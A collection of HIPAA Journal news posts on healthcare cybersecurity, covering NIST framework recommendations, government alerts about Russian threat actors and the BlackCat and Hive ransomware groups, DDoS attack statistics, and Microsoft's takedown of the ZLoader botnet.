The Workgroup for Electronic Data Interchange (WEDI) has responded to the request for information from the National Institute of Standards and Technology (NIST) and has made several recommendations for improving the NIST cybersecurity framework and supply chain risk management guidance to help healthcare organizations deal with some of the most pressing threats facing the sector.

Ransomware is one of the main threats facing the healthcare industry, and that is unlikely to change in the short to medium term.  To help healthcare organizations deal with the threat, WEDI has suggested NIST increase its focus on ransomware and address the issue of ransomware directly in the cybersecurity framework. NIST published a new ransomware resource in February 2022, which contains valuable information on protecting against, detecting, responding to, and recovering from ransomware attacks. WEDI feels the inclusion of ransomware within the cybersecurity framework will expand the reach and impact of the resource.

WEDI has also recommended the inclusion of specific case studies of healthcare organizations that have experienced a ransomware attack, updating the framework to define contingency planning strategies based on the type of healthcare organization and issue guidance with a focus on contingency planning, execution, and recovery. Ransomware attacks on healthcare providers carry risks that are not applicable to other entities. Further guidance in this area would be of great benefit to healthcare providers and could help to minimize disruption and patient safety issues.

Healthcare organizations have been developing patient access Application Programming Interfaces (APIs) and applications (apps) which are covered by HIPAA, and are therefore required to incorporate safeguards to ensure the privacy and security of any healthcare data they contain, but WEDI has drawn attention to the lack of robust privacy standards that are applicable to third party health apps that are not covered by HIPAA. WEDI says there is a need for a national security framework to ensure that health care data obtained by third-party apps are held to appropriate privacy and security standards.

The number of risks and vulnerabilities to portable and implantable medical devices has grown at an incredible rate in recent years and those risks are likely to grow exponentially in the years to come. WEDI has recommended NIST address cybersecurity issues related to these devices directly in the cybersecurity framework, and also address the issue of insider threats. Many healthcare data breaches are caused by insider threats such as lost electronic devices, phishing and social engineering attacks. WEDI suggests these issues and security awareness training should be addressed in the cybersecurity framework.

WEDI has also recommended NIST develop a version of its cybersecurity framework that is targeted at smaller healthcare organizations, which do not have the resources available to stay informed about the latest security developments and implement the latest security measures and protocols. A version of the framework that is more focused on the threats faced by smaller organizations would be of great benefit and should include realistic proactive steps that can be taken by small healthcare organizations to mitigate risks.

The post WEDI Makes Healthcare-Specific Recommendations for Improving the NIST Cybersecurity Framework appeared first on HIPAA Journal.

The five eyes cybersecurity agencies have recently issued a joint security alert warning about the threat of cyberattacks on critical infrastructure by Russian nation-state threat actors and pro-Russia cybercriminal groups.

Intelligence gathered by the agencies indicates the Russian government has been exploring opportunities for conducting cyberattacks against targets in the West in retaliation for the sanctions imposed on Russia and the support being provided to Ukraine. The agencies warn that Russian state-sponsored hacking groups have been conducting Distributed Denial of Service (DDoS) attacks in Ukraine and are known to have used destructive malware in Ukraine on government and critical infrastructure organizations. These hacking groups are highly skilled, can gain access to IT networks, maintain persistence, exfiltrate sensitive data, and can cause major disruption to critical systems, including industrial control systems.

The alert names several Russian government and military organizations that have engaged in these malicious activities, including the Russian Federal Security Service (FSB), Russian Foreign Intelligence Service (SVR), Russian General Staff Main Intelligence Directorate (GRU), and the Russian Ministry of Defense, Central Scientific Institute of Chemistry and Mechanics (TsNIIKhM).

The FSB is known to have conducted cyber operations against the Energy Sector, including companies in the US and UK, private sector organizations, cybersecurity companies, and others, and has engaged cybercriminal hackers and tasked them with conducting espionage-focused activities. The SVR has conducted targeted attacks on critical infrastructure organizations and is known for conducting sophisticated attacks using stealthy intrusion tradecraft. The GRU has targeted a range of critical infrastructure organizations, and the TsNIIKhM has a history of conducting attacks on foreign companies and government organziations.

Several cybercriminal groups have publicly voiced their support for Russia and have threatened to conduct cyberattacks on organizations that are perceived to have conducted cyber offensives against the Russian government or the Russian people. These cybercriminal groups are thought to pose a threat to all critical infrastructure organizations, including healthcare. They primarily conduct DDoS attacks with extortion and ransomware attacks.

The cybersecurity agencies have urged all critical infrastructure entities to take steps to prepare for and mitigate cyberattacks. The alert provides detailed information on threat actors and state-sponsored hacking groups of concern and recommendations for preparing for and mitigating cyber threats.

The post Five Eyes Agencies Warn Critical Infrastructure Orgs About Threat of Russian State-Sponsored and Criminal Cyberattacks appeared first on HIPAA Journal.

A new report from Comcast Business indicates 2021 was another record-breaking year for Distributed Denial of Service (DDoS) attacks. 9.84 million DDoS attacks were reported in 2021, which is a 14% increase from 2019, although slightly lower than the previous year when 10.1 million attacks were reported.

The slight decline in attacks was due to several factors. 2020 was a particularly bad year as it was a full lockdown year where employees were working remotely and students were learning from home, which provided attackers with a unique landscape against which to launch an unprecedented number of DDoS attacks, and the high prices of cryptocurrencies in 2021 meant many threat actors diverted their botnets from conducting DDoS attacks to mining cryptocurrencies.

DDoS attackers spared no one in 2021; however, 73% of attacks were conducted on just four sectors – healthcare, government, finance, and education. Attackers followed seasonal trends and activities throughout the year, with education being attacked to coincide with the school year, and COVID-19 and vaccine availability drove DDoS attacks on the healthcare industry.

Multi-vector attacks increased by 47% in 2021. Comcast Business DDoS Mitigation Services defended customers against 24,845 multi-vector attacks targeting layers 3, 4, & 7 (Network, Transport & Application) simultaneously. 69% of Comcast Business clients were victims of DDoS attacks in 2021, a 41% increase from 2020, and 55% of Comcast Business customers experienced multi-vector attacks targeting layers, 3, 4, & 7 simultaneously. There was also a major increase in the number of vectors used in multi-vector attacks, increasing from 5 in 2020 to 15 in 2021, with the amplification protocols in the attacks increasing from 3 to 9.

DDoS attacks flood victims’ networks with traffic to render them unusable, and while attacks are often conducted just for that reason, it is common for DDoS attacks to be conducted to distract organizations and consume resources while the attackers engage in other nefarious activities. There is a strong link between DDoS attacks and data breaches. According to a Neustar survey, almost half of organizations (47%) that suffered a DDoS attack discovered a virus on their networks after the attack, 44% said malware was activated, 33% reported a network breach, 32% reported customer data theft, 15% suffered a ransomware attack, and 11% were victims of financial theft.

The most severe attack in 2021 was a 242 Gbps DDoS attack, which would be sufficient to saturate even high bandwidth Ethernet Dedicated Internet (EDI) circuits within minutes. The magnitude of attacks has increased and a trend has been identified where threat actors conduct low-volume attacks to stay under the radar of IT teams and cause damage on multiple levels. This tactic can degrade website performance, yet the attacks are often not detected by IT teams, who only discover they have been targeted when they start receiving complaints from customers.

DDoS attacks are cheap to perform, costing just a few dollars, although for a few hundred dollars massive attacks can be conducted that can cripple businesses. DDoS attacks can be incredibly costly for businesses. The attacks can prevent businesses from reaching their customers and meeting SLAs, and the attacks can result in devastating financial and reputational damage. In some cases, the damage is so severe that businesses have been forced to permanently close. For businesses that depend on availability, every minute of downtime can cause hundreds of thousands or even millions of dollars in losses.

“Even if you are a small business and think you are at a lower risk, you could be in the supply chain for a larger organization,” said explained Comcast Business in the report. “You can be sure that your business partners are watching their threat risk factors and are increasingly concerned about doing business with companies that are not.”

The post 2021 Saw Record Numbers of DDoS Attacks on the Healthcare Industry appeared first on HIPAA Journal.

The Federal Bureau of Investigation (FBI) has issued a TLP: WHITE flash alert about the BlackCat ransomware-a-s-a-service (RaaS) operation. BlackCat, also known as ALPHAV, was launched in November 2021, shortly after the shutdown of the BlackMatter ransomware operation, which was a rebrand of DarkSide, which was behind the ransomware attack on Colonial Pipeline. A member of the operation has claimed they are a former affiliate of BlackMatter/DarkSide that branched out on their own; however, it is more likely that BlackCat is a rebrand of BlackMatter/DarkSide.

The FBI said many of the developers and money launderers involved with the BlackCat operation have been linked to DarkSide/BlackMatter, which indicates they have extensive networks and considerable experience with running RaaS operations. The BlackCat RaaS operation has not been active for long, but the group has already claimed at least 60 victims worldwide. BlackCat typically targets large organizations and demands ransom payments of several million dollars in Bitcoin or Monero, although the group does appear willing to negotiate payments with victims.

Unusually for ransomware, it is written in RUST, which is considered to be a more secure programming language that ensures better performance and concurrent processing. Initial access to networks is usually gained using previously compromised credentials, and once access is gained, Active Directory user and administrator accounts are compromised. The ransomware executable is highly customizable and allows attacks on a wide range of corporate environments, it supports multiple encryption methods, and can disable security features on victim networks.

The group uses Windows Task Scheduler to configure malicious Group Policy Objects (GPOs) to deploy the ransomware, initially using PowerShell scripts and Cobalt Strike. Windows administrative tools and Microsoft Sysinternals tools are also used during compromise. Prior to encrypting files, victim data is stolen, including from cloud providers. Threats are then issued to publish the stolen data on the leak site if the ransom is not paid. In the flash alert, the FBI has shared indicators of compromise (IoCs) and mitigation measures that should be adopted to improve security and make it harder for attacks to succeed.

As with all ransomware attacks, the FBI recommends not paying the ransom as there is no guarantee that files will be recovered, payment does not prevent further attacks, and there is no guarantee that any data stolen in the attack will not be published, stolen, or misused. However, the FBI accepts that payment of the ransom may be the only option in some cases to protect customers, patients, employees, and shareholders.

Regardless of whether or not the ransom is paid, the FBI has requested victims report attacks to their local FBI field office. The FBI has requested IP logs showing callbacks from foreign IP addresses, Bitcoin or Monero addresses and transaction IDs, communications with the threat actors, the decryptor file, and/or a benign sample of an encrypted file.

The post FBI Issues Warning About BlackCat Ransomware Operation appeared first on HIPAA Journal.

The HHS’ Office of Information Security Health Sector Cybersecurity Coordination Center (HC3) has issued a TLP: White alert about the Hive ransomware group – A particularly aggressive cybercriminal operation that has extensively targeted the healthcare sector in the United States.

HC3 has shared an analysis of the tactics, techniques, and procedures (TTPs) known to be used by the group in their attacks and has shared cybersecurity principles and mitigations that can be adopted to improve resilience against Hive ransomware attacks.

The Hive ransomware group has been conducting attacks since at least June 2021. The group is known for using double extortion tactics, where sensitive data is exfiltrated prior to file encryption and threats are issued to publish the data if the ransom is not paid. The group is also known to contact victims by phone to pressure them into paying the ransom.

Hive is a ransomware-a-service (RaaS) operation where affiliates are recruited to conduct attacks on the gang’s behalf in exchange for a cut of the profits that are generated, which allows the core members of the group to concentrate on development and operations.

Having affiliates with different specialties means a variety of TTPs are employed to gain access to networks; however, the group most commonly uses phishing emails, Remote Desktop Protocol, and VPN compromise in their attacks. Once access to networks is gained, compromised systems are searched to identify applications and processes involved in backing up data, and then those processes and applications are terminated or disrupted. Shadow copies, backup files, and system snapshots are also deleted to make it harder for victims to recover without paying the ransom.

The ransomware is actively developed, and several features and practices have been adopted to prevent analysis of the ransomware, interception and monitoring of negotiations with victims, and the group has adopted a new IPv4 obfuscation technique – IPfuscation – to make their attacks stealthier.

Defending against Hive ransomware attacks requires standard cybersecurity best practices to be followed, including  the following:

• Changing default passwords and setting strong passwords
• Implementing 2-factor authentication, especially for remote access services
• Providing regular security awareness training to the workforce
• Creating multiple copies of backups, testing those backups, and storing backups offline
• Ensuring there is continuous monitoring, supported by a constant input of threat data
• Implementing a comprehensive vulnerability management program and prioritizing known exploited vulnerabilities
• Ensuring software and operating systems are kept up to date
• Implementing comprehensive endpoint security solutions that are automatically updated with the latest signatures/updates.

The post HHS Issues Warning to HPH Sector about Hive Ransomware appeared first on HIPAA Journal.

The notorious cybercrime ZLoader botnet, which was used to deliver Ryuk ransomware in attacks on healthcare providers, has been disabled by Microsoft’s Digital Crimes Unit (DCU). Microsoft recently obtained a court order from the United States District Court for the Northern District of Georgia authorizing the seizure of 65 hard-coded domains used by the ZLoader botnet for command-and-control communications. Those domains have now been sinkholed, preventing the operator of the botnet from communicating with devices infected with ZLoader malware.

ZLoader malware included a domain generation algorithm (DGA) which is triggered if communication with the hard-coded domains is not possible, which serves as a failsafe against any takedown efforts. The court order also allowed Microsoft to seize 319 DGA-registered domains. Microsoft is working to block the registration of any future DGA domains.

ZLoader is part of a family of malware variants that descended from the ZeuS banking Trojan. Initially, ZeuS was used for credential and financial theft, with the aim of transferring money out of victims’ financial accounts. The threat actor behind the malware then established a malware-as-a-service operation to deliver malware and ransomware for other threat actors such as Ryuk.

Ryuk ransomware has been extensively used in attacks on the healthcare industry since its emergence in 2018, and ZLoader was one of the ways the ransomware was delivered. ZLoader is capable of disabling a popular antivirus solution to evade detection, and the malware has been installed on thousands of devices, many of which are in education and healthcare.

The takedown of the botnet is significant; however, the operators of the botnet are likely already working to set up new command and control infrastructure. Microsoft said the takedown has been a success and resulted in the temporary disabling of the ZLoader infrastructure, which has made it more difficult for the organized criminal gang to continue with its malicious activities.

“We referred this case to law enforcement, who are tracking this activity closely and will continue to work with our partners to monitor the behavior of these cybercriminals. We will work with internet service providers to identify and remediate victims,” said Microsoft. Microsoft also confirmed that it is prepared to take further legal action and implement technical measures to deal with ZLoader and other botnets.

Microsoft also named an individual who is believed to be responsible for developing a component of the malware that was used for delivering ransomware – Denis Malikov, who resides in Simferopol on the Crimean Peninsula. “We chose to name an individual in connection with this case to make clear that cybercriminals will not be allowed to hide behind the anonymity of the internet to commit their crimes.”

Microsoft said it was assisted with its investigation of the ZLoader operation by the cybersecurity firm ESET, Palo Alto Networks’ Unit 42, team, and Black Lotus Labs, and was provided with additional insights from the Financial Services Information Sharing and Analysis Centers (FS-ISAC), the Health Information Sharing and Analysis Center (H-ISAC), the Microsoft Threat Intelligence Center, and the Microsoft Defender Team.

The post Microsoft Sinkholes Notorious ZLoader Botnet appeared first on HIPAA Journal.